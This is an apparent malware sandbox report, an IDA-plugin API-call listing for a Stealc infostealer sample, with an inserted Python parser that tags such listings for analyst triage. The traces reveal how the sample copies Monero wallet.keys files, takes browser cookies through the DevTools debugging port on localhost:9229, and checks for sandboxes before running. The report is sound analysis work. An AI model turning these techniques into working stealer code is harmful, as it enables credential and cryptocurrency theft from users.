                                                      • lstrcpy.KERNEL32(?,?), ref: 02C88C65
                                                      • StrStrA.SHLWAPI(?,00638AD0), ref: 02C88C92
                                                      • lstrcpyn.KERNEL32(006393D0,?,00000000), ref: 02C88CB9
                                                      • lstrlen.KERNEL32(?), ref: 02C88CCC
                                                      • wsprintfA.USER32 ref: 02C88CDC
                                                      • lstrcpy.KERNEL32(?,006393D0), ref: 02C88CF2
                                                      • StrStrA.SHLWAPI(?,0063891C), ref: 02C88D1F
                                                      • lstrcpyn.KERNEL32(006393D0,?,00000000), ref: 02C88D3E
                                                      • lstrlen.KERNEL32(?), ref: 02C88D51
                                                      • wsprintfA.USER32 ref: 02C88D61
                                                      • lstrcpy.KERNEL32(?,?), ref: 02C88D77
                                                      • StrStrA.SHLWAPI(?,00638D3C), ref: 02C88DA4
                                                      • lstrcpyn.KERNEL32(006393D0,?,00000000), ref: 02C88DC3
                                                      • lstrlen.KERNEL32(?), ref: 02C88DD6
                                                      • wsprintfA.USER32 ref: 02C88DE6
                                                      • lstrcpy.KERNEL32(?,?), ref: 02C88DFC
                                                      • StrStrA.SHLWAPI(?,00638B34), ref: 02C88E29
                                                      • lstrcpyn.KERNEL32(006393D0,?,00000000), ref: 02C88E50
                                                      • lstrlen.KERNEL32(?), ref: 02C88E63
                                                      • wsprintfA.USER32 ref: 02C88E73
                                                      • lstrcpy.KERNEL32(?,006393D0), ref: 02C88E89
                                                      • lstrlen.KERNEL32(?), ref: 02C88EAE
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C88EE3
                                                      • strtok_s.MSVCRT ref: 02C89001
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy$lstrlen$lstrcpynwsprintf$FolderPathstrtok_s
                                                      • String ID:
                                                      • API String ID: 2042561329-0
                                                      • Opcode ID: 3e5a7dd2493b5aa3f281e3d459a021438d4c520a72c8d6f6fd8dab9dff384490
                                                      • Instruction ID: 76d77bc28e9874cf0a5bf18163b93f477cb4f63567805501be51225bfdafee88
                                                      • Opcode Fuzzy Hash: 3e5a7dd2493b5aa3f281e3d459a021438d4c520a72c8d6f6fd8dab9dff384490
                                                      • Instruction Fuzzy Hash: 9FE151B1900658AFDB10DB64DD48ADA77BAEF98304F144159F909E7350DB70AE05CFA1
                                                      APIs
                                                      • memset.MSVCRT ref: 004011AA
                                                        • Part of subcall function 00401120: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00401135
                                                        • Part of subcall function 00401120: HeapAlloc.KERNEL32(00000000), ref: 0040113C
                                                        • Part of subcall function 00401120: RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 00401159
                                                        • Part of subcall function 00401120: RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 00401173
                                                        • Part of subcall function 00401120: RegCloseKey.ADVAPI32(?), ref: 0040117D
                                                      • lstrcatA.KERNEL32(?,00000000), ref: 004011C0
                                                      • lstrlenA.KERNEL32(?), ref: 004011CD
                                                      • lstrcatA.KERNEL32(?,.keys), ref: 004011E8
                                                      • lstrcpy.KERNEL32(00000000,Function_0002CFF4), ref: 0040121F
                                                      • lstrlenA.KERNEL32(02D8A840), ref: 0040122D
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 00401251
                                                      • lstrcatA.KERNEL32(00000000,02D8A840), ref: 00401259
                                                      • lstrlenA.KERNEL32(\Monero\wallet.keys), ref: 00401264
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 00401288
                                                      • lstrcatA.KERNEL32(00000000,\Monero\wallet.keys), ref: 00401294
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 004012BA
                                                      • lstrcpy.KERNEL32(00000000,Function_0002CFF4), ref: 004012FF
                                                      • lstrlenA.KERNEL32(02D8DCB0), ref: 0040130E
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 00401335
                                                      • lstrcatA.KERNEL32(00000000,?), ref: 0040133D
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 00401378
                                                      • lstrcatA.KERNEL32(00000000), ref: 00401385
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 004013AC
                                                      • CopyFileA.KERNEL32(?,?,00000001), ref: 004013D5
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 00401401
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 0040143D
                                                        • Part of subcall function 0041EFC0: lstrcpy.KERNEL32(00000000,?), ref: 0041EFF2
                                                      • DeleteFileA.KERNEL32(?), ref: 00401471
                                                      • memset.MSVCRT ref: 0040148E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2248899859.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.2248899859.000000000048E000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.0000000000496000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.00000000004AF000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.0000000000638000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy$lstrcat$lstrlen$FileHeapmemset$AllocCloseCopyDeleteOpenProcessQueryValue
                                                      • String ID: .keys$\Monero\wallet.keys
                                                      • API String ID: 2734118222-3586502688
                                                      • Opcode ID: 272afd06092d23ba9ffd297ddbb04893c96f386607a5bf3016298e8a28865c6e
                                                      • Instruction ID: 107083fb19e5d757d6b5f7c97fc85a8bb09bd95212823e3c222e070f8096506b
                                                      • Opcode Fuzzy Hash: 272afd06092d23ba9ffd297ddbb04893c96f386607a5bf3016298e8a28865c6e
                                                      • Instruction Fuzzy Hash: A9A17F71B102069BCB21AB79DD89A9F77B9AF44304F04007AF905F72E1DB78DD058BA8
                                                      APIs
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 02C85B9C
                                                      • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 02C85BCB
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C85BFC
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C85C24
                                                      • lstrcat.KERNEL32(00000000,00000000), ref: 02C85C2F
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C85C57
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C85C8F
                                                      • lstrcat.KERNEL32(00000000,00000000), ref: 02C85C9A
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C85CBF
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 02C85CF5
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C85D1D
                                                      • lstrcat.KERNEL32(00000000,00000000), ref: 02C85D28
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C85D4F
                                                      • lstrlen.KERNEL32(0043179C), ref: 02C85D61
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C85D80
                                                      • lstrcat.KERNEL32(00000000,0043179C), ref: 02C85D8C
                                                      • lstrlen.KERNEL32(00638DD8), ref: 02C85D9B
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C85DBE
                                                      • lstrcat.KERNEL32(00000000,00000000), ref: 02C85DC9
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C85DF3
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C85E1F
                                                      • GetFileAttributesA.KERNEL32(00000000), ref: 02C85E26
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C85E7E
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C85EF4
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C85F1D
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C85F50
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C85F7C
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 02C85FB6
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C86013
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C86037
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy$lstrcat$lstrlen$AttributesFileFolderPath
                                                      • String ID:
                                                      • API String ID: 2428362635-0
                                                      • Opcode ID: 4c0de8b9607b3dae64bf6b53f6e62537ebce006a950589915d47254386edbdb5
                                                      • Instruction ID: dc54505c418e2d9bbb4e6f3b321298dcdaf6ad0ca43d69fe71cc488b1a44715e
                                                      • Opcode Fuzzy Hash: 4c0de8b9607b3dae64bf6b53f6e62537ebce006a950589915d47254386edbdb5
                                                      • Instruction Fuzzy Hash: 8602C3B1A016469FCB10AF74CD88AAE7BF6EF44348F558428EC05A7250DB74DE44DF91
                                                      APIs
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 02C8680C
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 02C86847
                                                      • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 02C86871
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C868A8
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C868CD
                                                      • lstrcat.KERNEL32(00000000,00000000), ref: 02C868D5
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C868FE
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy$FolderPathlstrcat
                                                      • String ID:
                                                      • API String ID: 2938889746-0
                                                      • Opcode ID: 9d5917b4d61bf762f55fd1ccb37321e6179371eb6c85f701233e840c4e5d0844
                                                      • Instruction ID: a9027282ba3fd9107c0b3d192f318c4f452e01f0fc7236a9a5ec526743e53b3c
                                                      • Opcode Fuzzy Hash: 9d5917b4d61bf762f55fd1ccb37321e6179371eb6c85f701233e840c4e5d0844
                                                      • Instruction Fuzzy Hash: 1DF1C370A016069BDB21FF75CC88AAE7BBAEF4430CF14C428E855A7290DB74DA45DF91
                                                      APIs
                                                        • Part of subcall function 02C96807: GetProcAddress.KERNEL32(006390E0,00638DC8), ref: 02C96860
                                                        • Part of subcall function 02C96807: GetProcAddress.KERNEL32(006390E0,00638E44), ref: 02C96879
                                                        • Part of subcall function 02C96807: GetProcAddress.KERNEL32(006390E0,00638A64), ref: 02C96891
                                                        • Part of subcall function 02C96807: GetProcAddress.KERNEL32(006390E0,00638A50), ref: 02C968A9
                                                        • Part of subcall function 02C96807: GetProcAddress.KERNEL32(006390E0,00638AF8), ref: 02C968C2
                                                        • Part of subcall function 02C96807: GetProcAddress.KERNEL32(006390E0,00638CD4), ref: 02C968DA
                                                        • Part of subcall function 02C96807: GetProcAddress.KERNEL32(006390E0,00638B3C), ref: 02C968F2
                                                        • Part of subcall function 02C96807: GetProcAddress.KERNEL32(006390E0,00638DA0), ref: 02C9690B
                                                        • Part of subcall function 02C96807: GetProcAddress.KERNEL32(006390E0,00638D48), ref: 02C96923
                                                        • Part of subcall function 02C96807: GetProcAddress.KERNEL32(006390E0,00638BBC), ref: 02C9693B
                                                        • Part of subcall function 02C96807: GetProcAddress.KERNEL32(006390E0,00638AE8), ref: 02C96954
                                                        • Part of subcall function 02C96807: GetProcAddress.KERNEL32(006390E0,00638E0C), ref: 02C9696C
                                                        • Part of subcall function 02C96807: GetProcAddress.KERNEL32(006390E0,006388B0), ref: 02C96984
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 02C92066
                                                      • ExitProcess.KERNEL32 ref: 02C9209E
                                                      • GetSystemInfo.KERNEL32(?), ref: 02C920A8
                                                      • ExitProcess.KERNEL32 ref: 02C920B6
                                                        • Part of subcall function 02C71297: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 02C712AD
                                                        • Part of subcall function 02C71297: VirtualAllocExNuma.KERNEL32(00000000), ref: 02C712B4
                                                        • Part of subcall function 02C71297: ExitProcess.KERNEL32 ref: 02C712BF
                                                        • Part of subcall function 02C71327: GlobalMemoryStatusEx.KERNEL32 ref: 02C71351
                                                        • Part of subcall function 02C71327: ExitProcess.KERNEL32 ref: 02C7137B
                                                      • GetUserDefaultLangID.KERNEL32 ref: 02C920C6
                                                      • ExitProcess.KERNEL32 ref: 02C92118
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressProc$Process$Exit$AllocCurrentDefaultGlobalInfoLangMemoryNumaStatusSystemUserVirtuallstrcpy
                                                      • String ID:
                                                      • API String ID: 1589815927-0
                                                      • Opcode ID: 93640e03c3836f20208e9c97ebb38f71becffdefc605de61920b8a9654901af0
                                                      • Instruction ID: d465b526a867ca6e1804a45630c704f33a0a11b8b763e4baae9a3c820f49b2be
                                                      • Opcode Fuzzy Hash: 93640e03c3836f20208e9c97ebb38f71becffdefc605de61920b8a9654901af0
                                                      • Instruction Fuzzy Hash: 12717F71500616AFDB20ABB0DC8CF6E7ABBAF85705F045018FD46A71A0DB749901EFA2
                                                      APIs
                                                        • Part of subcall function 004090C0: InternetOpenA.WININET(Function_0002CFF4,00000001,00000000,00000000,00000000), ref: 004090DF
                                                        • Part of subcall function 004090C0: InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 004090FC
                                                        • Part of subcall function 004090C0: InternetCloseHandle.WININET(00000000), ref: 00409109
                                                        • Part of subcall function 004090C0: strlen.MSVCRT ref: 00409125
                                                      • strlen.MSVCRT ref: 004092E1
                                                      • strlen.MSVCRT ref: 004092FA
                                                        • Part of subcall function 00417F70: memchr.MSVCRT ref: 00417FAF
                                                        • Part of subcall function 00417F70: memcmp.MSVCRT(00000000,?,?,?,"webSocketDebuggerUrl":,00000000), ref: 00417FC9
                                                        • Part of subcall function 00417F70: memchr.MSVCRT ref: 00417FE8
                                                        • Part of subcall function 00408980: std::_Xinvalid_argument.LIBCPMT ref: 00408996
                                                      • memset.MSVCRT ref: 00409341
                                                      • lstrcatA.KERNEL32(?,ws://localhost:9229), ref: 0040935C
                                                      • lstrcatA.KERNEL32(?,00000000), ref: 00409372
                                                      • strlen.MSVCRT ref: 00409399
                                                      • strlen.MSVCRT ref: 004093E6
                                                      • memcmp.MSVCRT(?,Function_0002CFF4,?), ref: 0040940B
                                                      • memset.MSVCRT ref: 00409532
                                                      • lstrcatA.KERNEL32(?,cookies), ref: 00409547
                                                      • lstrcatA.KERNEL32(?,0043179C), ref: 00409559
                                                      • lstrcatA.KERNEL32(?,?), ref: 0040956A
                                                      • lstrcatA.KERNEL32(?,00434BA0), ref: 0040957C
                                                      • lstrcatA.KERNEL32(?,?), ref: 0040958D
                                                      • lstrcatA.KERNEL32(?,.txt), ref: 0040959F
                                                      • lstrlenA.KERNEL32(?), ref: 004095B6
                                                      • lstrlenA.KERNEL32(?), ref: 004095DB
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 00409614
                                                      • memset.MSVCRT ref: 0040965C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2248899859.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.2248899859.000000000048E000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.0000000000496000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.00000000004AF000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.0000000000638000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcat$strlen$Internetmemset$Openlstrlenmemchrmemcmp$CloseHandleXinvalid_argumentlstrcpystd::_
                                                      • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                                                      • API String ID: 2819545660-3542011879
                                                      • Opcode ID: e3ab2ed6a6ca2e6a926d440d0d5d1526cccfabf02e2b455fdd1088b695db4e17
                                                      • Instruction ID: d96677364779d0a81b59f4340a1f2474f338e47f496b49ff071e593b853f3e6b
                                                      • Opcode Fuzzy Hash: e3ab2ed6a6ca2e6a926d440d0d5d1526cccfabf02e2b455fdd1088b695db4e17
                                                      • Instruction Fuzzy Hash: 14E11671E00218DBDF14DFA9D984ADEBBB5BF48304F10446AE509B7281DB78AE45CF98
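The Monero wallet function listed earlier (HKCU `SOFTWARE\monero-project\monero-core`, value `wallet_path`, the `.keys` and `\Monero\wallet.keys` suffixes, then CopyFileA and DeleteFileA) and the DevTools function just above (`http://localhost:9229/json`, `"webSocketDebuggerUrl":`, `ws://localhost:9229`, `cookies` and `.txt`) are readable here only as raw API-call traces. The following is an added example, not code from the Joe Sandbox report or from the Stealc sample: a Python parser for this IDA-plugin listing format that turns each `APIs` section into call records, separates string-literal arguments from addresses and `?` placeholders, and assigns behaviour tags. The tag table is an assumed mapping of my own, and the embedded sample lines are constructed for the example by copying lines from the two functions named above; the regex covers only the line shapes visible on this page.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Tuple

# One call line from the listing, in the three shapes seen on this page:
#   • lstrcatA.KERNEL32(?,.keys), ref: 004011E8
#   • Part of subcall function 00401120: RegCloseKey.ADVAPI32(?), ref: 0040117D
#   • memset.MSVCRT ref: 0040148E            (no argument list recorded)
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>.*)\),)?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)
# Arguments that are raw addresses, code symbols or unresolved ("?") rather than string literals.
NON_LITERAL_RE = re.compile(r"^(?:[0-9A-F]{8}|Function_[0-9A-F]+|\?)$")

# Assumed behaviour tags keyed by the APIs a function calls (not a Joe Sandbox mapping).
TAGS: Dict[str, set] = {
    "registry": {"RegOpenKeyExA", "RegQueryValueExA", "RegCloseKey"},
    "file_ops": {"CopyFileA", "DeleteFileA", "GetFileAttributesA", "SHGetFolderPathA"},
    "network": {"InternetOpenA", "InternetOpenUrlA", "InternetCloseHandle"},
    "env_check": {"GetSystemInfo", "GlobalMemoryStatusEx", "VirtualAllocExNuma", "GetUserDefaultLangID"},
}


@dataclass
class Call:
    api: str
    module: str
    args: Tuple[str, ...]
    ref: str              # address of the call site
    subcall: str = ""     # callee address when the line is "Part of subcall function ..."

    def literals(self) -> List[str]:
        return [a for a in self.args if a and not NON_LITERAL_RE.match(a)]


@dataclass
class FunctionBlock:
    calls: List[Call] = field(default_factory=list)

    def literals(self) -> List[str]:
        seen: List[str] = []
        for c in self.calls:
            for s in c.literals():
                if s not in seen:
                    seen.append(s)
        return seen

    def tags(self) -> List[str]:
        apis = {c.api for c in self.calls}
        return sorted(tag for tag, names in TAGS.items() if apis & names)


def parse_listing(text: str) -> List[FunctionBlock]:
    """Start a new function at each 'APIs' header and parse the call lines beneath it."""
    blocks: List[FunctionBlock] = []
    current = None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = FunctionBlock()
            blocks.append(current)
            continue
        m = CALL_RE.match(line)
        if m and current is not None:
            raw = m.group("args")
            args = tuple(a.strip() for a in raw.split(",")) if raw is not None else ()
            current.calls.append(Call(m.group("api"), m.group("mod"), args, m.group("ref"), m.group("sub") or ""))
    return [b for b in blocks if b.calls]


def summarize(text: str) -> List[dict]:
    """One row per function: lowest direct call-site address, behaviour tags, string literals."""
    rows = []
    for b in parse_listing(text):
        refs = [c.ref for c in b.calls if not c.subcall]   # subcall refs belong to the callee
        rows.append({"first_ref": min(refs) if refs else "", "tags": b.tags(), "strings": b.literals()})
    return rows


# Constructed sample: lines copied from the Monero-wallet and DevTools functions in this report.
SAMPLE = """\
APIs
• memset.MSVCRT ref: 004011AA
  • Part of subcall function 00401120: RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\\monero-project\\monero-core,00000000,00020119,?), ref: 00401159
  • Part of subcall function 00401120: RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 00401173
• lstrcatA.KERNEL32(?,.keys), ref: 004011E8
• lstrcatA.KERNEL32(00000000,\\Monero\\wallet.keys), ref: 00401294
• CopyFileA.KERNEL32(?,?,00000001), ref: 004013D5
• DeleteFileA.KERNEL32(?), ref: 00401471
• memset.MSVCRT ref: 0040148E
Strings
APIs
  • Part of subcall function 004090C0: InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 004090FC
• lstrcatA.KERNEL32(?,ws://localhost:9229), ref: 0040935C
• lstrcatA.KERNEL32(?,cookies), ref: 00409547
• lstrcatA.KERNEL32(?,.txt), ref: 0040959F
"""

if __name__ == "__main__":
    for row in summarize(SAMPLE):
        print(row["first_ref"], row["tags"], row["strings"])
```

Paste a whole report's function listing into `SAMPLE` (or read it from a file) and the summary gives a one-line-per-function view: the Monero function comes out tagged `file_ops` and `registry` with the wallet path strings, the DevTools function tagged `network` with the localhost:9229 URLs, which is the triage view a reverse engineer wants before opening the dump in IDA.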
                                                      APIs
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 02C8476A
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 02C8479D
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C847C5
                                                      • lstrcat.KERNEL32(00000000,00000000), ref: 02C847D0
                                                      • lstrlen.KERNEL32(00434CFC), ref: 02C847DB
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C847F8
                                                      • lstrcat.KERNEL32(00000000,00434CFC), ref: 02C84804
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C8482D
                                                      • lstrcat.KERNEL32(00000000,00000000), ref: 02C84838
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C8485F
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C8489E
                                                      • lstrcat.KERNEL32(00000000,?), ref: 02C848A6
                                                      • lstrlen.KERNEL32(0043179C), ref: 02C848B1
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C848CE
                                                      • lstrcat.KERNEL32(00000000,0043179C), ref: 02C848DA
                                                      • lstrlen.KERNEL32(00434D10), ref: 02C848E5
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C84902
                                                      • lstrcat.KERNEL32(00000000,00434D10), ref: 02C8490E
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C84935
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C84967
                                                      • GetFileAttributesA.KERNEL32(00000000), ref: 02C8496E
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C849C8
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C849F1
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C84A1A
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C84A42
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 02C84A76
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy$lstrcat$lstrlen$AttributesFile
                                                      • String ID:
                                                      • API String ID: 1033685851-0
                                                      • Opcode ID: 5d564a2f18783ced4a2ae64bbd7691d68900a1d5d45daa34de3019e736e23f54
                                                      • Instruction ID: ac269c04655d0f7719198f36e820bb176e5e2d31e2190e727296ee0c108120fe
                                                      • Opcode Fuzzy Hash: 5d564a2f18783ced4a2ae64bbd7691d68900a1d5d45daa34de3019e736e23f54
                                                      • Instruction Fuzzy Hash: 7EB19270A016579BDB24BF75CD88AAE7BAAAF54308F048428EC05E7250DB34D944EFA1
                                                      APIs
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 00421A1F
                                                      • lstrlenA.KERNEL32(02D65E50,00000000,00000000,?,?,00421D51), ref: 00421A30
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 00421A57
                                                      • lstrcatA.KERNEL32(00000000,00000000), ref: 00421A62
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 00421A91
                                                      • lstrlenA.KERNEL32(00434FA8,?,?,00421D51), ref: 00421AA3
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 00421AC4
                                                      • lstrcatA.KERNEL32(00000000,00434FA8,?,?,00421D51), ref: 00421AD0
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 00421AFF
                                                      • lstrlenA.KERNEL32(02D65FC0,?,?,00421D51), ref: 00421B15
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 00421B3C
                                                      • lstrcatA.KERNEL32(00000000,00000000), ref: 00421B47
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 00421B76
                                                      • lstrlenA.KERNEL32(00434FA8,?,?,00421D51), ref: 00421B88
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 00421BA9
                                                      • lstrcatA.KERNEL32(00000000,00434FA8,?,?,00421D51), ref: 00421BB5
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 00421BE4
                                                      • lstrlenA.KERNEL32(02D65F90,?,?,00421D51), ref: 00421BFA
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 00421C21
                                                      • lstrcatA.KERNEL32(00000000,00000000), ref: 00421C2C
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 00421C5B
                                                      • lstrlenA.KERNEL32(02D65FD0,?,?,00421D51), ref: 00421C71
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 00421C98
                                                      • lstrcatA.KERNEL32(00000000,00000000), ref: 00421CA3
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 00421CD2
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2248899859.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000001.00000002.2248899859.000000000048E000.00000040.00000001.01000000.00000006.sdmp
                                                       • Associated: 00000001.00000002.2248899859.0000000000496000.00000040.00000001.01000000.00000006.sdmp
                                                       • Associated: 00000001.00000002.2248899859.00000000004AF000.00000040.00000001.01000000.00000006.sdmp
                                                       • Associated: 00000001.00000002.2248899859.0000000000638000.00000040.00000001.01000000.00000006.sdmp
                                                       • Associated: 00000001.00000002.2248899859.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy$lstrcatlstrlen
                                                      • String ID:
                                                      • API String ID: 1049500425-0
                                                      • Opcode ID: e0ae158bfbcb9c85c3e113c7f8b0e949cdbc83a006c5a98e9bc8346273ae2ebe
                                                      • Instruction ID: 5f1dba79be954e749d9ca3b884a51ff6cc0f3d545b3a00a63ec801d565367c8d
                                                      • Opcode Fuzzy Hash: e0ae158bfbcb9c85c3e113c7f8b0e949cdbc83a006c5a98e9bc8346273ae2ebe
                                                      • Instruction Fuzzy Hash: 1B9131B07017039FD7209FBADD88A17B7E9AF24344F54542EA885D33A1DBB8E8418B64
                                                      APIs
                                                      • memset.MSVCRT ref: 02C71411
                                                        • Part of subcall function 02C71387: GetProcessHeap.KERNEL32(00000000,00000104), ref: 02C7139C
                                                        • Part of subcall function 02C71387: RtlAllocateHeap.NTDLL(00000000), ref: 02C713A3
                                                        • Part of subcall function 02C71387: RegOpenKeyExA.ADVAPI32(80000001,0043175C,00000000,00020119,?), ref: 02C713C0
                                                        • Part of subcall function 02C71387: RegQueryValueExA.ADVAPI32(?,00431750,00000000,00000000,00000000,000000FF), ref: 02C713DA
                                                        • Part of subcall function 02C71387: RegCloseKey.ADVAPI32(?), ref: 02C713E4
                                                      • lstrcat.KERNEL32(?,00000000), ref: 02C71427
                                                      • lstrlen.KERNEL32(?), ref: 02C71434
                                                      • lstrcat.KERNEL32(?,00431780), ref: 02C7144F
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 02C71486
                                                      • lstrlen.KERNEL32(006389F0), ref: 02C71494
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C714B8
